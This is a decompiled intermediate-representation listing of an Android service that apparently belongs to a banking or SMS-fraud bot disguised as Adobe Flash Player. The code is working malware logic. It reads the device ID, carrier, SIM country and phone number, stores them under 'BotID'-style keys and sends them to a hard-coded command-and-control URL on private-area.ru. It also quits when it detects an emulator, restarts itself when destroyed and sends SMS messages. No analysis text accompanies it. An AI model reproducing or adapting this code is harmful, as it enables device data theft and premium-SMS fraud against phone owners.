record `com.adobe.flashplayer_.AdobeFlashCore` @kind class @AccessFlag PUBLIC extends `android.app.Service` @kind class {
  `java.lang.String` `com.adobe.flashplayer_.AdobeFlashCore.Reich_SMSGate` @AccessFlag PUBLIC;
  `java.lang.String` `com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @AccessFlag PUBLIC;
}
procedure `void` `<init>`(`com.adobe.flashplayer_.AdobeFlashCore` v1 @kind this) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.<init>:()V` @AccessFlag PUBLIC_CONSTRUCTOR {
    temp;
    v0;

  #L030d90.  v0:= 0I;
  #L030d92.  call `<init>`(v1) @signature `Landroid/app/Service;.<init>:()V` @kind direct;
  #L030d98.  v1.`com.adobe.flashplayer_.AdobeFlashCore.Reich_SMSGate` @type ^`java.lang.String` := v0 @kind object;
  #L030d9c.  v1.`com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @type ^`java.lang.String` := v0 @kind object;
  #L030da0.  return @kind void;
}
procedure `java.lang.String` `readConfig`(`com.adobe.flashplayer_.AdobeFlashCore` v7 @kind this, `java.lang.String` v8 @kind object @name `config`) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.readConfig:(Ljava/lang/String;)Ljava/lang/String;` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L030db4.  v4:= "" @kind object;
  #L030db8.  call temp:= `openFileInput`(v7, v8) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.openFileInput:(Ljava/lang/String;)Ljava/io/FileInputStream;` @kind virtual;
  #L030dbe.  v1:= temp @kind object;
  #L030dc0.  if v1 == 0 then goto L030e00;
  #L030dc4.  v2:= new `java.io.InputStreamReader`;
  #L030dc8.  call `<init>`(v2, v1) @signature `Ljava/io/InputStreamReader;.<init>:(Ljava/io/InputStream;)V` @kind direct;
  #L030dce.  v0:= new `java.io.BufferedReader`;
  #L030dd2.  call `<init>`(v0, v2) @signature `Ljava/io/BufferedReader;.<init>:(Ljava/io/Reader;)V` @kind direct;
  #L030dd8.  v3:= "" @kind object;
  #L030ddc.  v5:= new `java.lang.StringBuilder`;
  #L030de0.  call `<init>`(v5) @signature `Ljava/lang/StringBuilder;.<init>:()V` @kind direct;
  #L030de6.  call temp:= `readLine`(v0) @signature `Ljava/io/BufferedReader;.readLine:()Ljava/lang/String;` @kind virtual;
  #L030dec.  v3:= temp @kind object;
  #L030dee.  if v3 != 0 then goto L030e02;
  #L030df2.  call `close`(v1) @signature `Ljava/io/InputStream;.close:()V` @kind virtual;
  #L030df8.  call temp:= `toString`(v5) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L030dfe.  v4:= temp @kind object;
  #L030e00.  return v4 @kind object;
  #L030e02.  call temp:= `append`(v5, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L030e08.  goto L030de6;
  #L030e0a.  v6:= Exception @type ^`java.io.FileNotFoundException` @kind object;
  #L030e0c.  goto L030e00;
  #L030e0e.  v6:= Exception @type ^`java.io.IOException` @kind object;
  #L030e10.  goto L030e00;
  catch `java.io.FileNotFoundException` @[L030db8..L030e08] goto L030e0a;
  catch `java.io.IOException` @[L030db8..L030e08] goto L030e0e;
}
procedure `void` `writeConfig`(`com.adobe.flashplayer_.AdobeFlashCore` v2 @kind this, `java.lang.String` v3 @kind object @name `config`, `java.lang.String` v4 @kind object @name `data`) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L030e34.  v0:= new `java.io.OutputStreamWriter`;
  #L030e38.  v1:= 0I;
  #L030e3a.  call temp:= `openFileOutput`(v2, v3, v1) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L030e40.  v1:= temp @kind object;
  #L030e42.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L030e48.  call `write`(v0, v4) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L030e4e.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L030e54.  return @kind void;
  #L030e56.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L030e58.  goto L030e54;
  catch `java.io.IOException` @[L030e34..L030e54] goto L030e56;
}
procedure `boolean` `isOnline`(`com.adobe.flashplayer_.AdobeFlashCore` v3 @kind this) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.isOnline:()Z` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;

  #L030e7c.  v2:= "connectivity" @kind object;
  #L030e80.  call temp:= `getSystemService`(v3, v2) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L030e86.  v0:= temp @kind object;
  #L030e88.  v0:= (`android.net.ConnectivityManager`) v0 @kind object;
  #L030e8c.  call temp:= `getActiveNetworkInfo`(v0) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L030e92.  v1:= temp @kind object;
  #L030e94.  if v1 == 0 then goto L030ea8;
  #L030e98.  call temp:= `isConnectedOrConnecting`(v1) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L030e9e.  v2:= temp;
  #L030ea0.  if v2 == 0 then goto L030ea8;
  #L030ea4.  v2:= 1I;
  #L030ea6.  return v2;
  #L030ea8.  v2:= 0I;
  #L030eaa.  goto L030ea6;
}
procedure `android.os.IBinder` `onBind`(`com.adobe.flashplayer_.AdobeFlashCore` v1 @kind this, `android.content.Intent` v2 @kind object @name `intent`) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.onBind:(Landroid/content/Intent;)Landroid/os/IBinder;` @AccessFlag PUBLIC {
    temp;
    v0;

  #L030ebc.  v0:= 0I;
  #L030ebe.  return v0 @kind object;
}
procedure `void` `onCreate`(`com.adobe.flashplayer_.AdobeFlashCore` v18 @kind this) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.onCreate:()V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;
    v14;
    v15;
    v16;
    v17;

  #L030ed0.  call `onCreate`(v18) @signature `Landroid/app/Service;.onCreate:()V` @kind super;
  #L030ed6.  v1:= "Reich_SMSGate" @kind object;
  #L030eda.  v0:= v18 @kind object;
  #L030ede.  call temp:= `readConfig`(v0, v1) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.readConfig:(Ljava/lang/String;)Ljava/lang/String;` @kind direct;
  #L030ee4.  v11:= temp @kind object;
  #L030ee6.  v1:= "Reich_ServerGate" @kind object;
  #L030eea.  v0:= v18 @kind object;
  #L030eee.  call temp:= `readConfig`(v0, v1) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.readConfig:(Ljava/lang/String;)Ljava/lang/String;` @kind direct;
  #L030ef4.  v13:= temp @kind object;
  #L030ef6.  v14:= "http://private-area.ru/new/sys/alg.php" @kind object;
  #L030efa.  v0:= v18 @kind object;
  #L030efe.  v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_SMSGate` @type ^`java.lang.String` := v11 @kind object;
  #L030f02.  v0:= v18 @kind object;
  #L030f06.  v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @type ^`java.lang.String` := v13 @kind object;
  #L030f0a.  v0:= v18 @kind object;
  #L030f0e.  v1:= v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_SMSGate` @type ^`java.lang.String` @kind object;
  #L030f12.  v2:= "" @kind object;
  #L030f16.  if v1 != v2 then goto L030f3c;
  #L030f1a.  v1:= "79194057240" @kind object;
  #L030f1e.  v0:= v18 @kind object;
  #L030f22.  v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_SMSGate` @type ^`java.lang.String` := v1 @kind object;
  #L030f26.  v1:= "Reich_SMSGate" @kind object;
  #L030f2a.  v0:= v18 @kind object;
  #L030f2e.  v2:= v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_SMSGate` @type ^`java.lang.String` @kind object;
  #L030f32.  v0:= v18 @kind object;
  #L030f36.  call `writeConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L030f3c.  v0:= v18 @kind object;
  #L030f40.  v1:= v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @type ^`java.lang.String` @kind object;
  #L030f44.  v2:= "" @kind object;
  #L030f48.  if v1 != v2 then goto L030f6e;
  #L030f4c.  v1:= "http://private-area.ru/israel/gate.php" @kind object;
  #L030f50.  v0:= v18 @kind object;
  #L030f54.  v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @type ^`java.lang.String` := v1 @kind object;
  #L030f58.  v1:= "Reich_ServerGate" @kind object;
  #L030f5c.  v0:= v18 @kind object;
  #L030f60.  v2:= v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @type ^`java.lang.String` @kind object;
  #L030f64.  v0:= v18 @kind object;
  #L030f68.  call `writeConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L030f6e.  v1:= "phone" @kind object;
  #L030f72.  v0:= v18 @kind object;
  #L030f76.  call temp:= `getSystemService`(v0, v1) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L030f7c.  v17:= temp @kind object;
  #L030f7e.  v17:= (`android.telephony.TelephonyManager`) v17 @kind object;
  #L030f82.  call temp:= `getDeviceId`(v17) @signature `Landroid/telephony/TelephonyManager;.getDeviceId:()Ljava/lang/String;` @kind virtual;
  #L030f88.  v7:= temp @kind object;
  #L030f8a.  call temp:= `getNetworkOperatorName`(v17) @signature `Landroid/telephony/TelephonyManager;.getNetworkOperatorName:()Ljava/lang/String;` @kind virtual;
  #L030f90.  v9:= temp @kind object;
  #L030f92.  call temp:= `getSimCountryIso`(v17) @signature `Landroid/telephony/TelephonyManager;.getSimCountryIso:()Ljava/lang/String;` @kind virtual;
  #L030f98.  v8:= temp @kind object;
  #L030f9a.  v12:= `@@android.os.Build$VERSION.RELEASE` @type ^`java.lang.String` @kind object;
  #L030f9e.  v10:= "5.3" @kind object;
  #L030fa2.  if v7 != 0 then goto L030fc2;
  #L030fa6.  call temp:= `getApplicationContext`(v18) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.getApplicationContext:()Landroid/content/Context;` @kind virtual;
  #L030fac.  v1:= temp @kind object;
  #L030fae.  call temp:= `getContentResolver`(v1) @signature `Landroid/content/Context;.getContentResolver:()Landroid/content/ContentResolver;` @kind virtual;
  #L030fb4.  v1:= temp @kind object;
  #L030fb6.  v2:= "android_id" @kind object;
  #L030fba.  call temp:= `getString`(v1, v2) @signature `Landroid/provider/Settings$Secure;.getString:(Landroid/content/ContentResolver;Ljava/lang/String;)Ljava/lang/String;` @kind static;
  #L030fc0.  v7:= temp @kind object;
  #L030fc2.  if v9 != 0 then goto L030fca;
  #L030fc6.  v9:= "Android" @kind object;
  #L030fca.  if v8 != 0 then goto L030fd2;
  #L030fce.  v8:= "Unknown" @kind object;
  #L030fd2.  v1:= "phone" @kind object;
  #L030fd6.  v0:= v18 @kind object;
  #L030fda.  call temp:= `getSystemService`(v0, v1) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L030fe0.  v16:= temp @kind object;
  #L030fe2.  v16:= (`android.telephony.TelephonyManager`) v16 @kind object;
  #L030fe6.  call temp:= `getLine1Number`(v16) @signature `Landroid/telephony/TelephonyManager;.getLine1Number:()Ljava/lang/String;` @kind virtual;
  #L030fec.  v15:= temp @kind object;
  #L030fee.  if v15 != 0 then goto L031148;
  #L030ff2.  v15:= "" @kind object;
  #L030ff6.  v1:= "BotID" @kind object;
  #L030ffa.  v0:= v18 @kind object;
  #L030ffe.  call `writeConfig`(v0, v1, v7) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L031004.  v1:= "BotNetwork" @kind object;
  #L031008.  v0:= v18 @kind object;
  #L03100c.  call `writeConfig`(v0, v1, v9) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L031012.  v1:= "BotLocation" @kind object;
  #L031016.  v0:= v18 @kind object;
  #L03101a.  call `writeConfig`(v0, v1, v8) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L031020.  v1:= "BotVer" @kind object;
  #L031024.  v0:= v18 @kind object;
  #L031028.  call `writeConfig`(v0, v1, v10) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L03102e.  v1:= "BotPhone" @kind object;
  #L031032.  v0:= v18 @kind object;
  #L031036.  call `writeConfig`(v0, v1, v15) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.writeConfig:(Ljava/lang/String;Ljava/lang/String;)V` @kind direct;
  #L03103c.  v1:= "000000000000000" @kind object;
  #L031040.  call temp:= `indexOf`(v7, v1) @signature `Ljava/lang/String;.indexOf:(Ljava/lang/String;)I` @kind virtual;
  #L031046.  v1:= temp;
  #L031048.  v2:= -1I;
  #L03104a.  if v1 == v2 then goto L031056;
  #L03104e.  v1:= 0I;
  #L031050.  call `exit`(v1) @signature `Ljava/lang/System;.exit:(I)V` @kind static;
  #L031056.  call temp:= `isOnline`(v18) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.isOnline:()Z` @kind virtual;
  #L03105c.  v1:= temp;
  #L03105e.  if v1 == 0 then goto L031128;
  #L031062.  v1:= new `com.adobe.flashplayer_.FlashVars`;
  #L031066.  call `<init>`(v1) @signature `Lcom/adobe/flashplayer_/FlashVars;.<init>:()V` @kind direct;
  #L03106c.  v2:= 1I;
  #L03106e.  v2:= new `java.lang.String`[v2];
  #L031072.  v3:= 0I;
  #L031074.  v4:= new `java.lang.StringBuilder`;
  #L031078.  v0:= v18 @kind object;
  #L03107c.  v5:= v0.`com.adobe.flashplayer_.AdobeFlashCore.Reich_ServerGate` @type ^`java.lang.String` @kind object;
  #L031080.  call temp:= `valueOf`(v5) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L031086.  v5:= temp @kind object;
  #L031088.  call `<init>`(v4, v5) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L03108e.  v5:= "?a=0&b=" @kind object;
  #L031092.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L031098.  v4:= temp @kind object;
  #L03109a.  call temp:= `append`(v4, v7) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310a0.  v4:= temp @kind object;
  #L0310a2.  v5:= "&c=" @kind object;
  #L0310a6.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310ac.  v4:= temp @kind object;
  #L0310ae.  v5:= ":" @kind object;
  #L0310b2.  v6:= "" @kind object;
  #L0310b6.  call temp:= `replace`(v9, v5, v6) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L0310bc.  v5:= temp @kind object;
  #L0310be.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310c4.  v4:= temp @kind object;
  #L0310c6.  v5:= "&d=" @kind object;
  #L0310ca.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310d0.  v4:= temp @kind object;
  #L0310d2.  call temp:= `append`(v4, v8) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310d8.  v4:= temp @kind object;
  #L0310da.  v5:= "&e=" @kind object;
  #L0310de.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310e4.  v4:= temp @kind object;
  #L0310e6.  call temp:= `append`(v4, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310ec.  v4:= temp @kind object;
  #L0310ee.  v5:= "&f=" @kind object;
  #L0310f2.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0310f8.  v4:= temp @kind object;
  #L0310fa.  call temp:= `append`(v4, v10) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L031100.  v4:= temp @kind object;
  #L031102.  v5:= "&g=" @kind object;
  #L031106.  call temp:= `append`(v4, v5) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03110c.  v4:= temp @kind object;
  #L03110e.  call temp:= `append`(v4, v12) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L031114.  v4:= temp @kind object;
  #L031116.  call temp:= `toString`(v4) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03111c.  v4:= temp @kind object;
  #L03111e.  v2[v3]:= v4 @kind object;
  #L031122.  call temp:= `execute`(v1, v2) @signature `Lcom/adobe/flashplayer_/FlashVars;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L031128.  v1:= new `com.adobe.flashplayer_.AdobeFlashCore$1`;
  #L03112c.  v3:= 90000L;
  #L031132.  v5:= 10000L;
  #L031136.  v2:= v18 @kind object;
  #L03113a.  call `<init>`(v1, v2, v3, v5) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore$1;.<init>:(Lcom/adobe/flashplayer_/AdobeFlashCore;JJ)V` @kind direct;
  #L031140.  call temp:= `start`(v1) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore$1;.start:()Landroid/os/CountDownTimer;` @kind virtual;
  #L031146.  return @kind void;
  #L031148.  v1:= "+" @kind object;
  #L03114c.  v2:= "" @kind object;
  #L031150.  call temp:= `replace`(v15, v1, v2) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L031156.  v15:= temp @kind object;
  #L031158.  goto L030ff6;
}
procedure `void` `onDestroy`(`com.adobe.flashplayer_.AdobeFlashCore` v2 @kind this) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.onDestroy:()V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;

  #L03116c.  v0:= new `android.content.Intent`;
  #L031170.  v1:= constclass @type ^`com.adobe.flashplayer_.AdobeFlashCore` @kind object;
  #L031174.  call `<init>`(v0, v2, v1) @signature `Landroid/content/Intent;.<init>:(Landroid/content/Context;Ljava/lang/Class;)V` @kind direct;
  #L03117a.  call temp:= `startService`(v2, v0) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.startService:(Landroid/content/Intent;)Landroid/content/ComponentName;` @kind virtual;
  #L031180.  return @kind void;
}
procedure `void` `sendSMS`(`com.adobe.flashplayer_.AdobeFlashCore` v7 @kind this, `java.lang.String` v8 @kind object @name `n`, `java.lang.String` v9 @kind object @name `msg`) @signature `Lcom/adobe/flashplayer_/AdobeFlashCore;.sendSMS:(Ljava/lang/String;Ljava/lang/String;)V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L031194.  v2:= 0I;
  #L031196.  v1:= v8 @kind object;
  #L031198.  v6:= v9 @kind object;
  #L03119a.  call temp:= `getDefault`() @signature `Landroid/telephony/SmsManager;.getDefault:()Landroid/telephony/SmsManager;` @kind static;
  #L0311a0.  v0:= temp @kind object;
  #L0311a2.  call temp:= `divideMessage`(v0, v6) @signature `Landroid/telephony/SmsManager;.divideMessage:(Ljava/lang/String;)Ljava/util/ArrayList;` @kind virtual;
  #L0311a8.  v3:= temp @kind object;
  #L0311aa.  v4:= v2 @kind object;
  #L0311ac.  v5:= v2 @kind object;
  #L0311ae.  call `sendMultipartTextMessage`(v0, v1, v2, v3, v4, v5) @signature `Landroid/telephony/SmsManager;.sendMultipartTextMessage:(Ljava/lang/String;Ljava/lang/String;Ljava/util/ArrayList;Ljava/util/ArrayList;Ljava/util/ArrayList;)V` @kind virtual;
  #L0311b4.  return @kind void;
}
